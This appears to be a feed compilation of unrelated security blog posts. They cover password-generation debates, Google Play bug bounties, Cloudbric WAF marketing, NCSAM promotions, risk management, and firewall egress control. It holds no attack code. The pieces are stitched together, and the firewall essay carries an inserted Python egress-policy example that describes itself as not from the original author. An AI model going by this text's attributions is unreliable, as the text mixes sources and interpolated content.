I first used the term security absolutism a few years ago now when writing about responses to folks using Cloudflare to implement HTTPS on their sites. As with this post, I proposed that a myopic focus on security was unhealthy and causes people to miss the many fine nuances involved in protecting online assets whilst still delivering a usable service. For example, this tweet in response to the terrible UX of generating passwords for people:

Clearly this is untrue for Disney and for every other service I can think of that's recently been the victim of credential stuffing (geez that list is getting big). Not a single one I can name has, after being on the receiving end of an attack, turned around and said "You know what? No longer allowing users to choose their own password and instead just assigning one to them sure beats the UX of dealing with a hacked account!". Not. One.

This is also a case where this particular site is by no means a valid reference point for the general online populace. Practical Pentest Labs is targeted at people who want to "take their hacking skills to the next level", which one would assume means the audience is somewhat more security-conscious than your average punter. This audience is better equipped to store secrets such as a generated password but again, they're also more likely to have a password manager in the first place thus negating the uniqueness value proposition of a generated secret.

To be clear, I don't have any personal gripes with Practical Pentest Labs and if this method of auth is working for them then good on 'em, that's their call. But regardless of how much you might like their approach, it's an inescapable reality that their implementation is highly abnormal and that's not by accident - this model is simply a UX nightmare. This approach would completely solve Disney's credential stuffing problem by entirely eradicating password reuse, that part I agree on:

But as for "all sites should generate the user's password", no, you're never going to see it happen at Disney because they actually want customers! This, again, is security absolutism because it places security above and beyond all else and damn the consequences.

By all means, people should robustly debate the merits of alternate auth systems, but you cannot escape the reality that no matter how strongly you might endorse this approach, websites simply don't implement it. There are very good reasons why not and if you're inclined to chime in on the comments section in support of generated passwords, perhaps start with thinking about why this approach is so rarely seen.

BlueKeep Attacks seen in the wild!

CVE-2019-0708, popularly known as BlueKeep, is an RDP pre-authentication vulnerability which allows an attacker to compromise a vulnerable system without user interaction. This exploit is also wormable, meaning that it can spread to other vulnerable systems in a similar way to how the WannaCry malware spread across the globe in 2017. Interestingly,…

What Are Some Barriers That Web Hosting Providers Face in Deploying a WAF?

Website owners rely on web hosting providers to get their websites up and running online. 

But here’s the thing that may trip up some website owners: Hosting providers are only responsible for protecting the server on which websites are hosted, but customers will need to protect their own websites within the server. 

Bottom line: Web hosting providers are not responsible for the security of websites themselves.

What some web hosting providers may not realize is that the level of security that a web hosting service offers is extremely important to a prospective customer.

Depending on their needs, customers may be looking to see whether a web hosting provider offers SSL, backups, DDoS mitigation, firewalls, and more. 

Web hosting providers may choose instead to focus on offering content management systems (WordPress, Drupal, Joomla etc.) rather than any web security tools. 

This blog post will discuss some of the concerns web hosting providers may have in partnering with a security vendor specifically to offer a WAF (Web Application Firewall). What are some barriers to entry and how can Cloudbric make the transition smoother compared to other WAF vendors?

1) Extremely long learning curve 

First, web hosting providers may be worried about the deployment and management requirements that come with installing and utilizing a WAF. 

Before they can extend security to their customers, web hosters are faced with a slight learning curve when configuring a WAF for the first time or when creating custom policy rules that fit their security needs.

Regardless of the WAF vendor that a web hoster ultimately partners with, there will be some kind of learning curve. Luckily WAF security vendors like Cloudbric seek to minimize management requirements by providing flexible deployment models.

With API integrations available for web hosting providers, these web hosting companies can easily integrate Cloudbric’s APIs into their WAF service sign up process to offer WAF as an add-on security service into their hosting plans. 

2) Perceived need for multiple security personnel to deploy and maintain a WAF

The primary business model from which web hosting providers profit the most is hosting websites on their servers. They have thousands of clients they manage and must keep happy.

Some of their responsibilities include guaranteeing high reliability/uptime in addition to providing technical support. 

Depending on the size of the web hosting firm, web hosters may feel like they need a big security team to deploy and maintain WAF. However, there are many security vendors out there that offer fully managed WAFs such as Cloudbric. 

The management overhead of a WAF can be very low, which allows IT personnel to just “set it and forget it.” This means web hosters do only the minimal work but at the same time still benefit from having an additional source of monthly revenue by extending web application security to their customers.

3) Complex UI/UX

UI/UX is extremely important to almost every software user out there. For WAFs, it’s no different. Most web hosting providers want a seamless experience when using a WAF console in order to manage customers and disseminate threat information easily. 

Furthermore, end users themselves should be able to log in to their own dashboards, understand the attacks against their websites, and configure basic security settings such as IP blocking.

One added benefit for web hosting providers is expending far fewer resources to reach those insights.

Cloudbric’s user-friendly WAF console makes it easy for web hosting providers to manage all client websites.

Learn more by requesting a demo with Cloudbric. 

4) Upkeep costs

For web hosters, there is always the fear of additional upkeep costs, upgrades, and other “hidden” costs.

Most web hosters are interested in making a return on investment (ROI) but will need to consider the total cost of ownership should they choose to provide WAF to their customers as an add-on security service. 

(Contact us to get a quote and see for yourself how Cloudbric offers the cheapest WAF compared to other vendors.)

The total cost of ownership includes more than just the product purchase. For WAFs, there might be installation fees and upkeep fees to worry about. Upkeep costs may include hardware or software updates. 

Fortunately, with cloud-based options like Cloudbric, there is no hardware to install or maintain for a dedicated WAF. 

Furthermore, there is no need to worry about management costs such as day-to-day tasks including any configurations, policy updates etc. Cloudbric’s security team of experts can handle all of this for web hosting providers. 

Finally, signature updates for the WAF technology itself are also not necessary because Cloudbric uses signature-free and AI techniques to detect threats.

Conclusion

For web hosting companies with a low-profit margin, adding complementary security services to their paid hosting plans can create new streams of revenue. 

Web hosting companies may be interested in distributing WAF to their customers but are hesitant to do so due to perceived barriers to entry. 

However, as we explored in this blog post, these barriers such as a need for a specialized security team, complex UI/UX, and upkeep costs, can all be addressed with the right WAF vendor.

If you’re a web hosting service provider, and if you’d like to talk to one of our security experts in more detail, fill out the form below! No commitments whatsoever. 


The post What Are Some Barriers That Web Hosting Providers Face in Deploying a WAF? appeared first on Cloudbric.

Expanding bug bounties on Google Play

Posted by Adam Bacchus, Sebastian Porst, and Patrick Mutchler — Android Security & Privacy

[Cross-posted from the Android Developers Blog]

We’re constantly looking for ways to further improve the security and privacy of our products, and the ecosystems they support. At Google, we understand the strength of open platforms and ecosystems, and that the best ideas don’t always come from within. It is for this reason that we offer a broad range of vulnerability reward programs, encouraging the community to help us improve security for everyone. Today, we’re expanding on those efforts with some big changes to Google Play Security Reward Program (GPSRP), as well as the launch of the new Developer Data Protection Reward Program (DDPRP).

Google Play Security Reward Program Scope Increases

We are increasing the scope of GPSRP to include all apps in Google Play with 100 million or more installs. These apps are now eligible for rewards, even if the app developers don’t have their own vulnerability disclosure or bug bounty program. In these scenarios, Google helps responsibly disclose identified vulnerabilities to the affected app developer. This opens the door for security researchers to help hundreds of organizations identify and fix vulnerabilities in their apps. If the developers already have their own programs, researchers can collect rewards directly from them on top of the rewards from Google. We encourage app developers to start their own vulnerability disclosure or bug bounty program to work directly with the security researcher community.

Vulnerability data from GPSRP helps Google create automated checks that scan all apps available in Google Play for similar vulnerabilities. Affected app developers are notified through the Play Console as part of the App Security Improvement (ASI) program, which provides information on the vulnerability and how to fix it. Over its lifetime, ASI has helped more than 300,000 developers fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users until the issue is fixed.

To date, GPSRP has paid out over $265,000 in bounties. Recent scope and reward increases have resulted in $75,500 in rewards across July & August alone. With these changes, we anticipate even further engagement from the security research community to bolster the success of the program.

Introducing the Developer Data Protection Reward Program

Today, we are also launching the Developer Data Protection Reward Program. DDPRP is a bounty program, in collaboration with HackerOne, meant to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions. It recognizes the contributions of individuals who help report apps that are violating Google Play, Google API, or Google Chrome Web Store Extensions program policies.

The program aims to reward anyone who can provide verifiable and unambiguous evidence of data abuse, in a similar model to Google’s other vulnerability reward programs. In particular, the program aims to identify situations where user data is being used or sold unexpectedly, or repurposed in an illegitimate way without user consent. If data abuse is identified related to an app or Chrome extension, that app or extension will accordingly be removed from Google Play or the Google Chrome Web Store. In the case of an app developer abusing access to Gmail restricted scopes, their API access will be removed. While no reward table or maximum reward is listed at this time, depending on impact, a single report could net a bounty as large as $50,000.

As 2019 continues, we look forward to seeing what researchers find next. Thank you to the entire community for contributing to keeping our platforms and ecosystems safe. Happy bug hunting!

October Is National Cyber Security Awareness Month: Be Part of Something Big

2018 marks the 15th year of National Cyber Security Awareness Month (NCSAM). The Internet touches every aspect of our lives, and keeping it safe and secure is everyone’s responsibility. You can make a difference by remaining diligent and staying cyber aware. Be part of something big this month. Learn more, be aware, and get involved.

Connection is an official Champion of NCSAM. We’re dedicating the month of October to spreading the word about the importance of cyber security, and providing tools and resources to help you stay safe and secure online.

Each week during October highlights a different cyber security theme, addressing specific challenges and opportunities for change. Stay tuned for information about the top cyber security threats, careers in cyber security, and why it’s everyone’s job to ensure online safety. What are you doing to keep the Internet safer and more secure? Be sure to check back each week to stay informed, and get tips from our experts about how you can participate in keeping everyone safe online.

The post October Is National Cyber Security Awareness Month: Be Part of Something Big appeared first on Connected.

Firewalls and the Need for Speed

I was looking for resources on campus network design and found these slides (pdf) from a 2011 Network Startup Resource Center presentation. These two caught my attention:

This bothered me, so I Tweeted about it.

This started some discussion, and prompted me to see what NSRC suggests for architecture these days. You can find the latest, from April 2018, here. Here is the bottom line for their suggested architecture:

What do you think of this architecture?

My Tweet has attracted some attention from the high speed network researcher community, some of whom assume I must be a junior security apprentice who equates "firewall" with "security." Long-time blog readers will laugh at that, like I did. So what was my problem with the original recommendation, and what problems do I have (if any) with the 2018 version?

First, let's be clear that I have always differentiated between visibility and control. A firewall is a poor visibility tool, but it is a control tool. It controls inbound or outbound activity according to its ability to perform in-line traffic inspection. This inline inspection comes at a cost, which is the major concern of those responding to my Tweet.

Notice how the presentation author thinks about firewalls. In the slides above, from the 2018 version, he says "firewalls don't protect users from getting viruses" because "clicked links while browsing" and "email attachments" are "both encrypted and firewalls won't help." Therefore, "since firewalls don't really protect users from viruses, let's focus on protecting critical server assets," because "some campuses can't develop the political backing to remove firewalls for the majority of the campus."

The author is arguing that firewalls are an inbound control mechanism, and they are ill-suited for the most prevalent threat vectors for users, in his opinion: "viruses," delivered via email attachment, or "clicked links."

Mail administrators can protect users from many malicious attachments. Desktop anti-virus can protect users from many malicious downloads delivered via "clicked links." If that is your worldview, of course firewalls are not important.

His argument for firewalls protecting servers is, implicitly, that servers may offer services that should not be exposed to the Internet. Rather than disabling those services, or limiting access via identity or local address restrictions, he says a firewall can provide that inbound control.

These arguments completely miss the point that firewalls are, in my opinion, more effective as an outbound control mechanism. For example, a firewall helps restrict adversary access to his victims when they reach outbound to establish post-exploitation command and control. This relies on the firewall identifying the attempted C2 as being malicious. To the extent intruders encrypt their C2 (and sites fail to inspect it) or use covert mechanisms (e.g., C2 over Twitter), firewalls will be less effective.

The previous argument assumes admins rely on the firewall to identify and block malicious outbound activity. Admins might alternatively identify the activity themselves, and direct the firewall to block outbound activity from designated compromised assets or to designated adversary infrastructure.

As some Twitter responders said, it's possible to do some or all of this without using a stateful firewall. I'm aware of the cool tricks one can play with routing to control traffic. Ken Meyers and I wrote about some of these approaches in 2005 in my book Extrusion Detection. See chapter 5, "Layer 3 Network Access Control."

Implementing these non-firewall-based security choices requires a high degree of diligence, which in turn requires visibility. I did not see this emphasized in the NSRC presentation. For example:

These are fine goals, but I don't equate "manageability" with visibility or security. I don't think "problems and viruses" captures the magnitude of the threat to research networks.

The core of the reaction to my original Tweet is that I don't appreciate the need for speed in research networks. I understand that. However, I can't understand the requirement for "full bandwidth, un-filtered access to the Internet." That is a recipe for disaster.

On the other hand, if you define partner specific networks, and allow essentially site-to-site connectivity with exquisite network security monitoring methods and operations, then I do not have a problem with eliminating firewalls from the architecture. I do have a problem with unrestricted access to adversary infrastructure.
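The outbound control described earlier (analysts identify compromised assets and adversary infrastructure and direct the firewall to block them) and the partner-specific-network model in the paragraph above can be expressed as one default-deny egress policy. The following is an added example, not code from the original post or from NSRC: it evaluates constructed flow records from a notional research subnet against partner allow rules and analyst-designated block lists, and emits the corresponding block rules. The subnet ranges, partner networks, ports, the "designated" addresses and the nftables `inet filter forward` chain the rules target are all assumptions of the example.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    proto: str


def parse_flows(text: str):
    """Parse 'src,dst,dport,proto' records, one per line (a constructed
    stand-in for exported flow data)."""
    flows = []
    for line in text.strip().splitlines():
        src, dst, dport, proto = [f.strip() for f in line.split(",")]
        flows.append(Flow(src, dst, int(dport), proto))
    return flows


class EgressPolicy:
    """Default-deny outbound policy: partner networks are allowed explicitly,
    analyst-designated compromised hosts and adversary infrastructure are
    denied first, and anything else leaving the monitored ranges is denied."""

    def __init__(self, internal, partners, compromised=(), adversary=()):
        self.internal = [ipaddress.ip_network(n) for n in internal]
        # partners: list of (cidr, ports); an empty port list means any port
        self.partners = [(ipaddress.ip_network(n), frozenset(p)) for n, p in partners]
        self.compromised = {ipaddress.ip_address(a) for a in compromised}
        self.adversary = [ipaddress.ip_network(n) for n in adversary]

    def _is_internal(self, addr):
        return any(addr in n for n in self.internal)

    def decide(self, flow):
        src = ipaddress.ip_address(flow.src)
        dst = ipaddress.ip_address(flow.dst)
        if not self._is_internal(src) or self._is_internal(dst):
            return "pass", "not an outbound flow; outside this policy's scope"
        if src in self.compromised:
            return "deny", "source is a designated compromised asset"
        if any(dst in n for n in self.adversary):
            return "deny", "destination is designated adversary infrastructure"
        for net, ports in self.partners:
            if dst in net and (not ports or flow.dport in ports):
                return "allow", f"partner network {net}"
        return "deny", "default deny: no partner rule matched"

    def nft_block_rules(self):
        """Rules an operator would push for the analyst-designated blocks
        (assumes an nftables 'inet filter forward' chain already exists)."""
        rules = [f"nft add rule inet filter forward ip saddr {a} drop"
                 for a in sorted(self.compromised, key=str)]
        rules += [f"nft add rule inet filter forward ip daddr {n} drop"
                  for n in self.adversary]
        return rules


def evaluate(policy, flows):
    """Return (flow, verdict, reason) for every flow."""
    return [(f, *policy.decide(f)) for f in flows]


# Constructed flow records (not real data): research subnet 10.10.0.0/16.
SAMPLE_FLOWS = """
10.10.1.1, 192.0.2.10, 443, tcp
10.10.1.1, 192.0.2.10, 22, tcp
10.10.5.5, 192.0.2.10, 443, tcp
10.10.1.2, 203.0.113.7, 443, tcp
10.10.1.3, 198.51.100.9, 8080, tcp
10.10.1.3, 10.10.2.4, 445, tcp
"""


def build_policy():
    return EgressPolicy(
        internal=["10.10.0.0/16"],
        partners=[("192.0.2.0/24", [443]), ("198.51.100.0/24", [])],
        compromised=["10.10.5.5"],      # identified by the analysts (constructed)
        adversary=["203.0.113.0/24"],   # designated C2 range (constructed)
    )


if __name__ == "__main__":
    policy = build_policy()
    for flow, verdict, reason in evaluate(policy, parse_flows(SAMPLE_FLOWS)):
        print(f"{flow.src} -> {flow.dst}:{flow.dport}  {verdict:5}  {reason}")
    print("\n".join(policy.nft_block_rules()))
```

Note the order of checks: analyst-designated blocks win over partner allow rules, so a compromised host loses its partner access until it is cleaned, and the default branch denies rather than allows. The decisions this produces are only as good as the monitoring that feeds the block lists, which is the visibility point the post makes.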

I understand that security doesn't exist to serve itself. Security exists to enable an organizational mission. Security must be a partner in network architecture design. It would be better to emphasize enhanced monitoring for the networks discussed above, and to think carefully before enabling speed without restrictions. The NSRC resources on the science DMZ merit consideration in this case.

Be a Conscientious Risk Manager

Whether you are a CIO or CISO in the Federal, State or Local, Education, or Commercial Business areas, you are all faced with the same challenge, whether you accept it or not. In the security risk management world, if the malicious actor wants into your network, they will figure out a way to get in. You of course still need to build a comprehensive risk governance and management plan, but that plan must be built on the premise of how you will respond when the breach occurs.

Having spent 38 years in Information Security, the one constant that I see is that the individuals who make it their business to steal or disrupt your data are better funded, better trained, and have unlimited hours to execute their trade. What we hope to achieve is, at worst, being a half-step behind them. There is no way to stay in step, and a step ahead is out of the question.

So what does this really mean to the conscientious risk manager? Create a strategy whereby you frequently identify the threat, and measure the risk against that threat in your as-built infrastructure. Test frequently, outside and inside, using the same tools and techniques the malicious actors use. Test user security awareness, as we know it only takes one click on a phishing email's malicious link to potentially bring down an entire enterprise. Measure, document, prioritize, and build a risk roadmap strategy to keep risk mitigation focused on those most critical exploitable areas.

Three Top Security Imperatives
Keep in mind that your top three security imperatives are: Reducing your threat exposure, enhancing your response and recovery times, and increasing security visibility. What does security visibility mean? Implementing the people, process, and technology in key security areas to give you a fighting chance to detect, and react to, malicious and advanced persistent threats.

Let’s talk people, process, and technology. We all know users are the weakest link in any security chain. Not because they have sinister intent, although sometimes they do, but primarily because in today’s high-powered technical, mobile, and social world, it is commonplace for a lapse in judgment to occur. We live in a rapid-fire, high-availability, high-output world, and mistakes can and will be made. So make it less commonplace: train and educate often, and monitor closely for when that lapse in judgment occurs.

Process: Again our high-powered technical, mobile, and social world often demands we run at warp speed. Who has time to document? Well — make the time. Good documentation to include process, policies and standards, as well as a documented and managed configuration control process, will help keep you more secure. Every process, policy and standard document has to have an assigned owner, has to have a designated review date, and has to have an oversight or governance process. All roles and responsibilities need to be included in the documentation, and the expected outcome needs to be defined. Make the time to prepare and socialize your critical information security program documentation.

Technology: Many risk owners fall prey to purchasing every piece of security technology available, at what I like to call the security “choke points”, end-point, network, edge, gateway, etc. This is just what everyone does. However, why not use the process we discussed above — measure, document, prioritize, and build a risk roadmap strategy — as your guideline for what you purchase and deploy for technology. Ask yourself — what is so wrong with selecting and implementing a product, only after you validate how it will help you manage your documented security risk? Of course the answer to that is — nothing.

Focus on Seamless Collaboration
You have documented your risk, you have prioritized your risk roadmap, and as a result you know the very specific technology, or set of technologies, you need to implement first. Most importantly, your technology selections should focus on products that collaborate in a seamless way. In other words, your end-point, edge, network, gateway, sandbox, etc., security technologies all talk to each other. We call this approach to complete security visibility across the whole landscape, Unified Security Stack. And, don’t forget that all technology must have a people and process component as well.

Good information security risk management and risk governance does not come by accident. It takes planning and execution. In the end, although you may not keep the bad guy out, you will be better prepared for when.

The post Be a Conscientious Risk Manager appeared first on Connected.

Protecting Critical Infrastructure from Cyber Threats

We’ve made it to week five of National Cyber Security Awareness Month (NCSAM)! The theme this week is “Protecting Critical Infrastructure from Cyber Threats.” The basic infrastructure that supports our daily lives is deeply dependent on the Internet, and, therefore, continually exposed to the risk of new threats and cyber attacks. As security breaches grow in frequency and sophistication every day, it’s crucial to build resiliency and then take steps to protect critical infrastructure to remain safe and secure online.

During the last week of NCSAM, the experts at Connection would like to remind you of the importance of identifying current and future strategies to protect your infrastructure and manage your risk. Cyber security is one of the biggest challenges organizations face today. Regardless of size or industry, every organization must ask themselves, is my security strategy up to date? If your organization is looking to stay on the front line of cyber security, it’s imperative to know how an end-to-end risk management strategy can help you properly secure your infrastructure.

Our security experts have an abundance of experience, and several areas of expertise we can put to work for you. We are committed to keeping your organization safe and secure, and can help design, deploy, and support solutions to address your critical risks and defend your critical infrastructure. For more information, contact one of our security experts today!

The post Protecting Critical Infrastructure from Cyber Threats appeared first on Connected.

NCSAM, Week Five: Protecting Critical Infrastructure

It’s Week 5 of National Cyber Security Awareness Month (NCSAM). This week, the focus is on protecting critical infrastructure—the essential systems that support our daily lives such as the electric grid, financial institutions, and transportation. Unfortunately, attacks on critical infrastructure have become a concern worldwide. A devastating attack isn’t just a theoretical possibility anymore. As we’ve recently seen with Equifax, and other security breaches in healthcare and other industries, the growing threat of serious attacks on critical infrastructure is real. These days, hackers have become much more formidable, and we will undoubtedly see more of these attacks in the future. It’s no longer a matter of if there will be another attack, but when. Let’s celebrate this last week of NCSAM by staying aware and being prepared.

Protecting your infrastructure requires constant vigilance and attention to evolving cyber attacks. Risk is inherent in everything we do, so trying to stay ahead of the cyber security curve is key. Our team of security experts can help you build a security strategy to detect, protect, and react to the complete threat lifecycle. The threats we all need to manage today evolve quickly, and we can help you minimize your risk and maximize your defenses to improve your cyber resiliency. For some expert insight on securing your critical infrastructure, give us a call and discover the Connection difference.

The post NCSAM, Week Five: Protecting Critical Infrastructure appeared first on Connected.

The New Security Reality

It’s week 4 of National Cyber Security Awareness Month (NCSAM). Each week of NCSAM is dedicated to a specific cybersecurity theme. The theme this week is “The Internet Wants YOU: Consider a Career in Cyber Security.”

With the continuous state of change in the global threat landscape, organizations face cyber attacks and security breaches that are growing in frequency and sophistication every day. But now, consider this: according to a study by the Center for Cyber Safety and Education, there will be a shortage of 1.8 million information security workers by 2022. This gap should be of great concern to organizations.

Skilled people make the difference in protecting sensitive data, so it’s more critical than ever that organizations begin to attract and retain the cybersecurity talent needed to defend against the evolving threat landscape. At Connection, we help inspire individuals coming out of universities to engage in co-op or intern-related opportunities, and I strongly encourage other organizations to see what they can do to help young people today who are really interested in building their skills in this area.

The figures don’t lie. The demand for cyber security will only continue to grow. Through local collaborative efforts between employers, training providers, and community leaders, we can ensure individuals have the opportunity to build on their tech knowledge and participate in a secure, thriving economy.

The post The New Security Reality appeared first on Connected.

Cyber Security Careers Are in High Demand

October is National Cyber Security Awareness Month, which is an annual campaign to raise awareness about the importance of cyber security. Week 4 of NCSAM is all about the growing field of cyber security and why you might want to consider this career.

It’s impossible to overstate the importance of security in today’s digital world. Cyber attacks are growing in frequency and sophistication every day, and a key risk to our economy and security is the lack of professionals to protect our growing networks. According to a study by the Center for Cyber Safety and Education, by 2022, there will be a shortage of 1.8 million information security workers. So, it’s critical that we begin now to prepare our students—and any others who are interested in making a career move—to fill these gaps. Many colleges and universities have developed information assurance programs that help technical, security-minded students achieve a great foundation in this industry. We also challenge corporations to offer intern and co-op opportunities for students in these degree programs, so they can see what security looks like in practical, business-world applications.

Connection is committed to promoting cyber security and online safety. Join Connection during Week 4 of NCSAM, as we explore cyber security as a viable and rewarding profession and encourage people from all backgrounds to see information security as an essential career path.

The post Cyber Security Careers Are in High Demand appeared first on Connected.